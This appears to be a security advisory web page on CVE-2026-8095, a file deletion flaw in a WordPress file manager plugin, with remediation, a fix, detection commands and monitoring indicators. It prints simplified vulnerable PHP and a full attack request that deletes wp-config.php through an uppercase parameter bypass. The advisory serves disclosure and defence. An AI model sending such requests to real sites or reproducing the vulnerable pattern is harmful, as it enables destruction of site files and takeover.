Skip to main content
COSMICBYTEZLABS
NewsSecurityHOWTOsToolsTraining
StudyProjectsNewsletterHire MeAbout
Subscribe

Press Enter to search or Esc to close

News
Security
HOWTOs
Tools
Training
Study
Projects
Newsletter
Hire Me
About
RSS Feed
Reading List
Subscribe

Stay in the Loop

Get the latest security alerts, tutorials, and tech insights delivered to your inbox.

Subscribe NowFree forever. No spam.
COSMICBYTEZLABS

Your trusted source for IT intelligence, cybersecurity insights, and hands-on technical guides.

1794+ Articles
149+ Guides

CONTENT

  • Latest News
  • Security Alerts
  • HOWTOs
  • Checklists
  • Projects
  • Exam Prep

RESOURCES

  • Search
  • Browse Tags
  • Newsletter Archive
  • Reading List
  • RSS Feed

COMPANY

  • About Us
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CosmicBytez Labs. All rights reserved.

System Status: Operational
  1. Home
  2. Security
  3. CVE-2026-8095: WordPress Frontend File Manager Plugin Allows Arbitrary File Deletion
CVE-2026-8095: WordPress Frontend File Manager Plugin Allows Arbitrary File Deletion
SECURITYHIGHCVE-2026-8095

CVE-2026-8095: WordPress Frontend File Manager Plugin Allows Arbitrary File Deletion

A high-severity authenticated file deletion vulnerability in the nmedia Frontend File Manager Plugin for WordPress allows subscribers to delete any file...

Dylan H.

Security Team

June 28, 2026
5 min read

Affected Products

  • nmedia Frontend File Manager Plugin for WordPress <= 23.6

Vulnerability Overview

The nmedia Frontend File Manager Plugin for WordPress contains a high-severity authenticated arbitrary file deletion vulnerability tracked as CVE-2026-8095. The flaw allows an authenticated attacker with as little as Subscriber-level access to delete any file on the web server — including the critical wp-config.php — which can lead to full site compromise.

The vulnerability was discovered and reported by Wordfence and affects all plugin versions through 23.6.

Vulnerability Summary

AttributeValue
CVE IDCVE-2026-8095
CVSS v3.1 Score8.1 (High)
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
TypeArbitrary File Deletion (CWE-73)
Affected Pluginnmedia Frontend File Manager Plugin
Affected VersionsAll versions ≤ 23.6
Authentication RequiredYes — Subscriber level (low privilege)
AssignerWordfence
Patch AvailableNo — unpatched at time of disclosure

Technical Details

The vulnerability resides in the wpfm_file_meta_update AJAX handler. The handler is supposed to block use of the wpfm_dir_path parameter via an unset check, but this check is bypassable using uppercase input.

Root Cause: Uppercase Bypass

// Simplified vulnerable logic
function wpfm_file_meta_update() {
    $params = $_POST;
 
    // Developer intended to block this parameter
    if (isset($params['wpfm_dir_path'])) {
        unset($params['wpfm_dir_path']);
    }
 
    // BYPASS: Attacker submits 'WPFM_DIR_PATH' in uppercase
    // sanitize_key() converts it back to lowercase
    foreach ($params as $key => $value) {
        $clean_key = sanitize_key($key);
        // Now 'wpfm_dir_path' is present after normalization
        update_post_meta($post_id, $clean_key, $value);
    }
 
    // The resulting path is passed to unlink() with no containment
    delete_file_locally($params['WPFM_DIR_PATH'] . '/' . $filename);
}
 
function delete_file_locally($path) {
    // No directory traversal protection or path containment
    unlink($path);
}

Attack Request

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.example.com
Cookie: wordpress_logged_in_[hash]=[subscriber_session]
Content-Type: application/x-www-form-urlencoded
 
action=wpfm_file_meta_update&post_id=1&WPFM_DIR_PATH=/var/www/html/wordpress
&filename=wp-config.php&nonce=[valid_nonce]

If successful, this deletes wp-config.php, rendering the site non-functional and potentially enabling an attacker to re-run the WordPress installation wizard to gain administrative control.

CVSS Breakdown

MetricValueRationale
Attack VectorNetworkRemotely exploitable via HTTP
Attack ComplexityLowReliable — no race condition required
Privileges RequiredLowSubscriber account sufficient
User InteractionNoneNo victim interaction needed
ConfidentialityNoneNo direct data exfiltration
IntegrityHighArbitrary file deletion
AvailabilityHighCan render site completely unavailable

Impact

Successful exploitation enables an authenticated attacker (Subscriber level) to:

  • Delete wp-config.php — exposes database credentials if readable, then breaks the site
  • Delete theme files — deface or break the front end
  • Delete plugin files — disable security plugins like Wordfence
  • Delete media uploads — destroy user content
  • Trigger reinstallation — if wp-config.php is deleted, the next visitor may be prompted to run the WordPress setup wizard, enabling admin account creation by the attacker

Affected Versions

Plugin VersionStatus
≤ 23.6Vulnerable
No patched version available—

Remediation

Immediate Actions (Site Administrators)

Since no patch exists at time of disclosure, apply these interim mitigations:

  1. Deactivate or remove the plugin until a patched version is released
  2. Restrict user registration — if public registration is enabled with default Subscriber role, disable it
  3. Audit existing Subscriber accounts for suspicious activity
  4. Enforce MFA on all WordPress accounts, especially admin roles
  5. Deploy a WAF (Wordfence, Sucuri) with file deletion protection rules
  6. Monitor AJAX requests to admin-ajax.php for wpfm_file_meta_update actions

Detection: Check for Compromise

# Look for AJAX calls to the vulnerable handler
grep "wpfm_file_meta_update" /var/log/apache2/access.log
 
# Check if wp-config.php is present
ls -la /var/www/html/wordpress/wp-config.php
 
# Review recently deleted files (if auditd is configured)
ausearch -k file_deletion --start today

Developer Fix (Plugin)

The correct fix requires both blocking the uppercase bypass AND implementing path containment:

function wpfm_file_meta_update() {
    // Normalize keys before the check
    $params = array_change_key_case($_POST, CASE_LOWER);
 
    // Block directory path manipulation
    if (isset($params['wpfm_dir_path'])) {
        unset($params['wpfm_dir_path']);
    }
 
    // ...
}
 
function delete_file_locally($path) {
    // Enforce path containment within the uploads directory
    $allowed_base = wp_upload_dir()['basedir'];
    $real_path = realpath($path);
 
    if ($real_path === false || strpos($real_path, $allowed_base) !== 0) {
        wp_die('Invalid file path.');
    }
 
    unlink($real_path);
}

Monitoring

Set up alerts for these indicators:

Suspicious Activity Patterns:
- POST to admin-ajax.php with action=wpfm_file_meta_update from non-admin accounts
- Requests containing 'WPFM_DIR_PATH' in POST body
- 404 errors on wp-config.php immediately after plugin AJAX calls
- WordPress setup/install page (wp-admin/setup-config.php) accessed by unknown IP

References

  • NVD — CVE-2026-8095
  • Wordfence Threat Intelligence
  • CWE-73: External Control of File Name or Path
  • RedPacket Security — CVE-2026-8095 Alert

Published: June 28, 2026

Related Advisories

  • CVE-2026-13485: SQL Injection in SourceCodester Timetabling System
  • CVE-2026-13486: SQL Injection in SourceCodester Timetabling System (preview6.php)
#CVE#WordPress#File Deletion#Plugin Vulnerability#Wordfence

Related Articles

CVE-2026-12923: YouTube Showcase WordPress Plugin Arbitrary Function Call

A high-severity arbitrary function call vulnerability in the YouTube Showcase plugin allows authenticated attackers to invoke arbitrary PHP functions via...

3 min read

CVE-2026-9711: Critical SQL Injection in EventON WordPress Plugin (CVSS 9.8)

A critical unauthenticated SQL injection vulnerability in the EventON WordPress Virtual Event Calendar Plugin affects versions up to 5.0.11, exposing...

3 min read

CVE-2026-8935: WP Maps Pro Unauthenticated Admin Account Creation (CVSS 9.8)

A critical unauthenticated vulnerability in the WP Maps Pro WordPress plugin before 6.1.1 allows any visitor to create an administrator account and...

3 min read
Back to all Security Alerts